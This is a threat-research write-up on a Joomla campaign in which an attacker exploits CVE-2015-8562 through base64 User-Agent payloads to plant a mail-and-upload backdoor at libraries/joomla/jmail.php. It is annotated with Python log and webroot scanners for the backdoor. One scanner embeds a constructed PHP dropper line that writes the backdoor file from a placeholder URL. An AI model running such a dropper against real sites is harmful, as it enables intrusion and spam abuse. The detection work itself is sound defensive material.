March 5, 2019
Research By: Asaf G. and Adi I.
Joomla! is one of the most popular CMS platforms and is used by hundreds of thousands of organizations worldwide. Over the years, many vulnerabilities have been found in the product, such as Joomla Core Sterilizer Cross-Site Scripting Filter Privilege Escalation (CVE-2017-7985) and Joomla Object Injection Remote Command Execution (CVE-2015-8562). Indeed, the number of known Joomla vulnerabilities has surged significantly over the past two years.
More recently though, Check Point Research has come across a new campaign from a known threat actor who is now exploiting a new backdoor with an old vulnerability in Joomla! and is using it to monetize his attack.
Fig 1: Joomla Vulnerabilities over the years
Jmail is Joomla’s mail service, enabling the user to send mail through the platform. Although intended to send emails, as with any PHP code, when it lacks the proper security mechanisms it can be manipulated for phishing, spam and even to host a backdoor infrastructure within the platform. Indeed, with simple manipulations of the User-Agent header of HTTP requests, one can manipulate the platform and override the existing Jmail service.
The threat actor, Alarg53, is certainly aware of this and is currently exploiting it to carry out a profitable spam campaign. But this is not the first time Alarg53 has embarked on such a venture. Two years ago he gained worldwide attention by hacking Stanford University servers via a WordPress vulnerability for similar purposes. While Alarg53 is a known hacker who has managed to hack more than 15,000 sites, this time he has hit the big time, as his attacks have evolved to include a significant, high-scale backdoor and phishing infrastructure.
The Attack Flow
- Exploiting Joomla Object Injection Remote Command Execution
First, the attacker uses an old and known object injection Remote Code Execution (RCE) vulnerability, in which code is injected into the User-Agent header field of HTTP requests. In our case, the attacker injects a base64-encoded string into the User-Agent field.
Fig 2: The base64 decoded PHP code
The PHP code then downloads the files and stores them in a specific path.
Once decoded, the string is PHP code that runs on the victim’s machine. The code tries to download specific files from Pastebin and store them in a designated path. In one of the download attempts, we noticed that the designated path is “./libraries/joomla/jmail.php”, which we found very interesting.
It’s worth mentioning that the URLs to some of the files were dead when discovered.
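As an added defender-side example (not code from the write-up or from Check Point), the following Python scans web-server access logs for User-Agent values that carry a base64-encoded PHP dropper of the kind described above and flags the jmail.php drop path. It assumes combined-format logs; the log lines, client IPs, URL and sample payload are constructed.

```python
import base64
import binascii
import re
# Indicators taken from the write-up: the dropped backdoor path and the PHP calls
# a dropper needs in order to fetch a remote file and write it to disk.
BACKDOOR_PATH = "./libraries/joomla/jmail.php"
PHP_MARKERS = ("<?php", "file_put_contents", "file_get_contents", "eval(", "pastebin")
# Combined log format (Apache/nginx): the User-Agent is the last quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# A base64 run long enough to carry code; the short tokens in normal UAs never match.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
def decode_b64_runs(ua):
    """Decode every long base64 run in a User-Agent, skipping runs that are not valid base64."""
    decoded = []
    for m in B64_RE.finditer(ua):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded

def inspect_user_agent(ua):
    """Return the sorted indicators found in one User-Agent value (empty list if benign)."""
    hits = set()
    for text in decode_b64_runs(ua):
        lowered = text.lower()
        hits.update(marker for marker in PHP_MARKERS if marker in lowered)
        if BACKDOOR_PATH in text:
            hits.add("path:" + BACKDOOR_PATH)
    return sorted(hits)

def scan_log(lines):
    """Return (client_ip, request, indicators) for each log line whose UA decodes to PHP."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m:
            hits = inspect_user_agent(m.group("ua"))
            if hits:
                findings.append((m.group("ip"), m.group("req"), hits))
    return findings

# Constructed sample: a dropper fragment of the kind Fig 2 shows, base64-encoded into the
# User-Agent as the write-up describes. The URL and the client IPs are placeholders.
SAMPLE_PHP = "<?php file_put_contents('./libraries/joomla/jmail.php', file_get_contents('PLACEHOLDER_URL'));"
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_PHP.encode()).decode()
SAMPLE_LOG = [
    '198.51.100.4 - - [05/Mar/2019:09:59:58 +0000] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
    '203.0.113.7 - - [05/Mar/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "' + SAMPLE_PAYLOAD + '"',
]
```

Run scan_log over a real access log one line at a time; every hit is a request worth correlating with new or modified files under libraries/.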
Overriding Joomla’s Jmail service
The interesting file turned out to be an HTML file that also contains PHP code. The file contains two major sections that serve two functions – sending mail and uploading files. The file name and its location in Joomla’s libraries folder are chosen to make administrators think that the backdoor is actually a legitimate Joomla core file.
Fig 3: The mail section in the file
Fig 4: The upload section in the file
In order to disguise the upload feature, the attacker uses many BR tags and puts the relevant code at the end of the file.
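An added hunting example, not from the write-up, for locating a dropped file with the layout described in this section: an HTML file padded with BR tags and ending in a PHP block that sends mail and handles uploads. It assumes the backdoor uses PHP’s mail() and $_FILES/move_uploaded_file (an assumption, since the write-up does not name the calls) and builds a constructed sample webroot to scan.

```python
import os
import re
import tempfile
# Heuristics for the dropped file described above. mail()/$_FILES/move_uploaded_file are the
# standard PHP calls for the two features the write-up names (an assumption about the backdoor);
# the <br> padding and the PHP block at the end of the file are taken from the write-up.
MAIL_RE = re.compile(r'\bmail\s*\(', re.I)
UPLOAD_RE = re.compile(r'\$_FILES\b|move_uploaded_file\s*\(', re.I)
BR_RE = re.compile(r'<br\s*/?>', re.I)
MIN_BR_RUN = 50   # assumption: legitimate library code never carries this much padding
KNOWN_DROP_PATH = "libraries/joomla/jmail.php"   # drop path named in the write-up

def score_file(path):
    """Return the reasons a file looks like the Jmail backdoor (empty list if clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    reasons = []
    if path.replace(os.sep, "/").endswith(KNOWN_DROP_PATH):
        reasons.append("known drop path")
    has_php = "<?php" in body
    if has_php and MAIL_RE.search(body):
        reasons.append("mail sender")
    if has_php and UPLOAD_RE.search(body):
        reasons.append("file upload handler")
    if len(BR_RE.findall(body)) >= MIN_BR_RUN and body.rstrip().endswith("?>"):
        reasons.append("<br> padding hiding trailing PHP")
    return reasons

def scan_webroot(root):
    """Walk a Joomla install; return {relative path: reasons} for suspicious .php/.html files."""
    found = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".html")):
                full = os.path.join(dirpath, name)
                reasons = score_file(full)
                if reasons:
                    found[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return found

def build_sample_webroot():
    """Create a constructed mini webroot: one benign core-like file and one backdoor-like file."""
    root = tempfile.mkdtemp(prefix="joomla_sample_")
    os.makedirs(os.path.join(root, "libraries", "joomla"))
    with open(os.path.join(root, "libraries", "joomla", "mail.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\nclass JMail { public function send() { return true; } }\n")
    # Stand-in for the dropped file: HTML, <br> padding, then a PHP block carrying only the
    # marker names (comment text, not a working backdoor) so the heuristics fire.
    fake = "<html><body>" + "<br>" * 200 + "<?php // constructed: mail( ... ) and move_uploaded_file( ... ) on $_FILES\n?>"
    with open(os.path.join(root, "libraries", "joomla", "jmail.php"), "w", encoding="utf-8") as fh:
        fh.write(fake)
    return root
```

Point scan_webroot at a real Joomla document root; any file with more than one reason, or any hit under libraries/, deserves a diff against a clean copy of the same Joomla version.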
Significant backdoor and phishing infrastructure
From now on, this file acts as an infrastructure through which the attacker can upload files and send mail for his own purposes. Based on our threat actor’s activity on the web, it seems this infrastructure is being used for phishing and mail spamming.
Fig 5: An example of a phishing page made by the attacker
Who’s Behind the Attack?
Based on several indicators, the threat actor behind the scenes is an Egyptian defacement hacker referred to as Alarg53. Over the past few years, Alarg53 has managed to hack more than 15,000 websites, replacing their home pages with a “Hacked by Alarg53” sign. Since then, Alarg53 has not only tried to hack websites but has also tried to establish a phishing and spamming infrastructure. Two years ago, Alarg53 gained worldwide attention by attacking the website of the Biology of Aging Center at Stanford University. At first, it was thought to be just another “Hacked By Alarg53” attack, but within a few hours, two PHP files were uploaded to the relevant servers, enabling them to send large amounts of spam mail.
Fig 6: An example of a “Hacked By Alarg53” home page
At first, Alarg53 was primarily a hacktivist, hacking sites in order to support his ideology, as well as for the pure challenge of hacking. Recently, though, he started to monetize his activities through crypto mining attacks and the phishing infrastructure.
His attacks have affected many countries around the world, including the US, Mexico, Portugal, the UK, France, India and Japan. Many industries were also affected, including Finance, Banking and Government.
Fig 7: A map showing Alarg53 activities
Jmail Breaker is a significant backdoor and phishing infrastructure established by a known hacker with a strong track record. Using an old Joomla Object Injection vulnerability, the attacker has managed to create an interesting chain that can eventually be leveraged for monetization through a phishing and spamming infrastructure. We predict that we will see more evidence of such spamming methodologies in the near future.
SandBlast Network Protection
Check Point customers are protected by the following IPS protections:
- Joomla Object Injection Remote Command Execution (CVE-2015-8562)
- Joomla JmailBreaker PHP Web Shell Backdoor
- Joomla JmailBreaker Arbitrary file upload